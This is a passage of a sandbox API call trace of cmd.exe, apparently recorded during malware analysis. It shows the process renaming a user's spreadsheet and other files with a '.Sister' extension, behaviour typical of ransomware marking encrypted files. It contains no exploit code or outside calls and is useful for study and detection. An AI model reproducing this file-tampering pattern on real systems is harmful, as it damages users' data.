_Buffer="\r\n") returned 2 [0304.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.478] GetFileType (hFile=0x50) returned 0x2 [0304.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.478] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0304.478] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.478] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0304.483] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.484] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.484] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.484] malloc (_Size=0xffce) returned 0x21eda19fec0 [0304.484] ??_V@YAXPEAX@Z () returned 0x21eda19fec0 [0304.484] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.484] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.484] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.484] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.484] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.485] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.485] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.485] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.485] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.485] ??_V@YAXPEAX@Z () returned 0x1 [0304.485] GetProcessHeap () returned 0x21ed8c70000 [0304.485] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x110) returned 0x21ed8d6b480 [0304.485] GetProcessHeap () returned 0x21ed8c70000 [0304.485] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b480, Size=0x90) returned 0x21ed8d44860 [0304.485] GetProcessHeap () returned 0x21ed8c70000 [0304.485] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44860) returned 0x90 [0304.485] GetProcessHeap () returned 0x21ed8c70000 [0304.485] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x98) returned 0x21ed8d44d60 [0304.486] GetProcessHeap () returned 0x21ed8c70000 [0304.486] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x110) returned 0x21ed8d6b240 [0304.486] GetProcessHeap () returned 0x21ed8c70000 [0304.486] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6b240, Size=0x90) returned 0x21ed8d45120 [0304.486] GetProcessHeap () returned 0x21ed8c70000 [0304.486] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45120) returned 0x90 [0304.486] malloc (_Size=0xffce) returned 0x21eda19fec0 [0304.486] ??_V@YAXPEAX@Z () returned 0x21eda19fec0 [0304.486] GetProcessHeap () returned 0x21ed8c70000 [0304.486] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8c7cb80 [0304.486] GetProcessHeap () returned 0x21ed8c70000 [0304.486] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937d6e0 [0304.486] _wcsicmp (_String1="H9s7Hw-GdZ3UkH71Zv7J.xlsx", _String2=".") returned 58 [0304.486] _wcsicmp (_String1="H9s7Hw-GdZ3UkH71Zv7J.xlsx", _String2="..") returned 58 [0304.487] GetFileAttributesW (lpFileName="H9s7Hw-GdZ3UkH71Zv7J.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\h9s7hw-gdz3ukh71zv7j.xlsx")) returned 0x20 [0304.487] GetProcessHeap () returned 0x21ed8c70000 [0304.487] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed8d19690 [0304.490] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8d196a0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.490] SetErrorMode (uMode=0x0) returned 0x0 [0304.491] SetErrorMode (uMode=0x1) returned 0x0 [0304.491] GetFullPathNameW (in: lpFileName="H9s7Hw-GdZ3UkH71Zv7J.xlsx", nBufferLength=0x7fe7, lpBuffer=0x21eda19fec0, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\H9s7Hw-GdZ3UkH71Zv7J.xlsx", lpFilePart=0xa6cf4fd660*="H9s7Hw-GdZ3UkH71Zv7J.xlsx") returned 0x33 [0304.491] SetErrorMode (uMode=0x0) returned 0x1 [0304.491] GetProcessHeap () returned 0x21ed8c70000 [0304.491] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937e0a0 [0304.491] _wcsicmp (_String1="H9s7Hw-GdZ3UkH71Zv7J.xlsx", _String2=".") returned 58 [0304.491] _wcsicmp (_String1="H9s7Hw-GdZ3UkH71Zv7J.xlsx", _String2="..") returned 58 [0304.491] GetFileAttributesW (lpFileName="H9s7Hw-GdZ3UkH71Zv7J.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\h9s7hw-gdz3ukh71zv7j.xlsx")) returned 0x20 [0304.492] ??_V@YAXPEAX@Z () returned 0x1 [0304.492] malloc (_Size=0xffce) returned 0x21eda19fec0 [0304.492] ??_V@YAXPEAX@Z () returned 0x21eda19fec0 [0304.492] malloc (_Size=0xffce) returned 0x21eda1afea0 [0304.492] ??_V@YAXPEAX@Z () returned 0x21eda1afea0 [0304.493] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\H9s7Hw-GdZ3UkH71Zv7J.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\h9s7hw-gdz3ukh71zv7j.xlsx")) returned 0x20 [0304.493] malloc (_Size=0xffce) returned 0x21ed993f900 [0304.493] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.493] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\H9s7Hw-GdZ3UkH71Zv7J.xlsx", fInfoLevelId=0x1, lpFindFileData=0x21ed937d6f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed937d6f0) returned 0x21ed8cc7180 [0304.494] malloc (_Size=0xffce) returned 0x21ed994f8e0 [0304.494] ??_V@YAXPEAX@Z () returned 0x21ed994f8e0 [0304.494] ??_V@YAXPEAX@Z () returned 0x1 [0304.494] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\H9s7Hw-GdZ3UkH71Zv7J.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\h9s7hw-gdz3ukh71zv7j.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\H9s7Hw-GdZ3UkH71Zv7J.xlsx.Sister" (normalized: "c:\\users\\fd1hvy\\documents\\h9s7hw-gdz3ukh71zv7j.xlsx.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0304.495] FindNextFileW (in: hFindFile=0x21ed8cc7180, lpFindFileData=0x21ed937d6f0 | out: lpFindFileData=0x21ed937d6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88e295a0, ftCreationTime.dwHighDateTime=0x1d585c5, ftLastAccessTime.dwLowDateTime=0x6268600, ftLastAccessTime.dwHighDateTime=0x1d5b147, ftLastWriteTime.dwLowDateTime=0x6268600, ftLastWriteTime.dwHighDateTime=0x1d5b147, nFileSizeHigh=0x0, nFileSizeLow=0x5337, dwReserved0=0x0, dwReserved1=0x0, cFileName="H9s7Hw-GdZ3UkH71Zv7J.xlsx", cAlternateFileName="")) returned 0 [0304.502] GetLastError () returned 0x12 [0304.503] FindClose (in: hFindFile=0x21ed8cc7180 | out: hFindFile=0x21ed8cc7180) returned 1 [0304.503] ??_V@YAXPEAX@Z () returned 0x1 [0304.503] ??_V@YAXPEAX@Z () returned 0x1 [0304.503] ??_V@YAXPEAX@Z () returned 0x1 [0304.503] ??_V@YAXPEAX@Z () returned 0x1 [0304.503] GetProcessHeap () returned 0x21ed8c70000 [0304.503] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7900 [0304.503] GetProcessHeap () returned 0x21ed8c70000 [0304.503] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95820, Size=0x16) returned 0x21ed8c95ac0 [0304.504] GetProcessHeap () returned 0x21ed8c70000 [0304.504] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95ac0) returned 0x16 [0304.504] GetProcessHeap () returned 0x21ed8c70000 [0304.504] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d45b30, Size=0x20) returned 0x21ed8d45cb0 [0304.504] GetProcessHeap () returned 0x21ed8c70000 [0304.504] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45cb0) returned 0x20 [0304.504] GetProcessHeap () returned 0x21ed8c70000 [0304.504] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed8d60f80 [0304.504] GetProcessHeap () returned 0x21ed8c70000 [0304.504] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d60f80, Size=0xb2) returned 0x21ed93b69f0 [0304.504] GetProcessHeap () returned 0x21ed8c70000 [0304.504] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b69f0) returned 0xb2 [0304.505] GetProcessHeap () returned 0x21ed8c70000 [0304.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d584a0 [0304.505] GetProcessHeap () returned 0x21ed8c70000 [0304.505] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d584a0, Size=0x30) returned 0x21ed8d584a0 [0304.505] GetProcessHeap () returned 0x21ed8c70000 [0304.505] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d584a0) returned 0x30 [0304.505] GetProcessHeap () returned 0x21ed8c70000 [0304.505] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d584e0 [0304.505] malloc (_Size=0x1ff9c) returned 0x21eda19fec0 [0304.506] GetProcessHeap () returned 0x21ed8c70000 [0304.506] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b52b0 [0304.507] GetProcessHeap () returned 0x21ed8c70000 [0304.507] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed93b5c70 [0304.507] ??_V@YAXPEAX@Z () returned 0x1 [0304.507] malloc (_Size=0x1ff9c) returned 0x21eda19fec0 [0304.507] GetProcessHeap () returned 0x21ed8c70000 [0304.507] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed93b4cb0 [0304.507] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21eda19fec0, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0304.507] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="Users", cAlternateFileName="")) returned 0x21ed8cc73c0 [0304.508] FindClose (in: hFindFile=0x21ed8cc73c0 | out: hFindFile=0x21ed8cc73c0) returned 1 [0304.508] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8cc7660 [0304.508] FindClose (in: hFindFile=0x21ed8cc7660 | out: hFindFile=0x21ed8cc7660) returned 1 [0304.508] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8cc79c0 [0304.508] FindClose (in: hFindFile=0x21ed8cc79c0 | out: hFindFile=0x21ed8cc79c0) returned 1 [0304.511] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xd623d33f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xd623d33f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x1010, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0304.511] malloc (_Size=0x1ff9c) returned 0x21ed993f900 [0304.511] ??_V@YAXPEAX@Z () returned 0x21ed993f900 [0304.512] GetProcessHeap () returned 0x21ed8c70000 [0304.512] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67b30 [0304.512] ??_V@YAXPEAX@Z () returned 0x1 [0304.512] ??_V@YAXPEAX@Z () returned 0x1 [0304.512] GetProcessHeap () returned 0x21ed8c70000 [0304.512] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d584e0, Size=0x490) returned 0x21ed8d584e0 [0304.512] GetProcessHeap () returned 0x21ed8c70000 [0304.512] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d584e0) returned 0x490 [0304.512] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0304.512] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.512] GetFileType (hFile=0x50) returned 0x2 [0304.512] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.513] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0304.513] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.513] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0304.520] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.520] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Documents") returned 25 [0304.521] _vsnwprintf (in: _Buffer=0x21ed8e80192, _BufferCount=0x83cc, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0304.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.521] GetFileType (hFile=0x50) returned 0x2 [0304.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.521] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0304.521] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.521] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x1a) returned 1 [0304.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.522] GetFileType (hFile=0x50) returned 0x2 [0304.522] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.522] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.522] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.523] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d584b0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d584b0*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0304.523] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0304.523] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.523] GetFileType (hFile=0x50) returned 0x2 [0304.523] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.523] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0304.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.524] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0304.531] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0304.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.531] GetFileType (hFile=0x50) returned 0x2 [0304.531] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0304.531] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0304.532] _get_osfhandle (_FileHandle=1) returned 0x50 [0304.532] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0304.537] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0304.538] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0304.538] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0304.538] malloc (_Size=0xffce) returned 0x21eda19fec0 [0304.538] ??_V@YAXPEAX@Z () returned 0x21eda19fec0 [0304.538] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0304.538] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0304.538] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0304.538] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0304.538] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0304.538] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0304.538] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0304.538] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0304.538] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0304.538] ??_V@YAXPEAX@Z () returned 0x1 [0304.538] GetProcessHeap () returned 0x21ed8c70000 [0304.538] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f720 [0304.539] GetProcessHeap () returned 0x21ed8c70000 [0304.539] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f720, Size=0x130) returned 0x21ed93b1570 [0304.539] GetProcessHeap () returned 0x21ed8c70000 [0304.539] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b1570) returned 0x130 [0304.539] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.539] malloc (_Size=0xffce) returned 0x21eda19fec0 [0304.539] ??_V@YAXPEAX@Z () returned 0x21eda19fec0 [0304.539] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0304.539] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21eda19fec0, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0304.541] ??_V@YAXPEAX@Z () returned 0x1 [0304.541] GetProcessHeap () returned 0x21ed8c70000 [0304.541] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed93b1f70 [0304.541] GetProcessHeap () returned 0x21ed8c70000 [0304.541] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d5f720 [0304.541] GetProcessHeap () returned 0x21ed8c70000 [0304.541] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f720, Size=0x130) returned 0x21ed93b11b0 [0304.541] GetProcessHeap () returned 0x21ed8c70000 [0304.541] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b11b0) returned 0x130 [0304.541] malloc (_Size=0xffce) returned 0x21eda19fec0 [0304.541] ??_V@YAXPEAX@Z () returned 0x21eda19fec0 [0304.541] GetProcessHeap () returned 0x21ed8c70000 [0304.542] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8cc7ba0 [0304.542] GetProcessHeap () returned 0x21ed8c70000 [0304.542] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937c5d0 [0304.542] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.542] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.542] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.542] GetLastError () returned 0x2 [0304.542] GetProcessHeap () returned 0x21ed8c70000 [0304.542] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9280080 [0304.542] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9280090 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents") returned 0x19 [0304.542] SetErrorMode (uMode=0x0) returned 0x0 [0304.542] SetErrorMode (uMode=0x1) returned 0x0 [0304.542] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21eda19fec0, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0304.542] SetErrorMode (uMode=0x0) returned 0x1 [0304.544] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0304.544] GetProcessHeap () returned 0x21ed8c70000 [0304.544] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed937d200 [0304.544] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0304.544] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0304.544] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.544] GetLastError () returned 0x2 [0304.544] ??_V@YAXPEAX@Z () returned 0x1 [0304.545] malloc (_Size=0xffce) returned 0x21eda19fec0 [0304.545] ??_V@YAXPEAX@Z () returned 0x21eda19fec0 [0304.545] malloc (_Size=0xffce) returned 0x21eda1afea0 [0304.545] ??_V@YAXPEAX@Z () returned 0x21eda1afea0 [0304.545] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0304.545] GetLastError () returned 0x2 [0304.545] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.545] GetFileType (hFile=0x54) returned 0x2 [0304.545] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0304.545] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0304.546] _get_osfhandle (_FileHandle=2) returned 0x54 [0304.546] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0304.547] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.547] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0304.547] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0304.551] longjmp () [0304.551] ??_V@YAXPEAX@Z () returned 0x1 [0304.551] FindNextFileW (in: hFindFile=0x21ed8c7cf40, lpFindFileData=0xa6cf4fe640 | out: 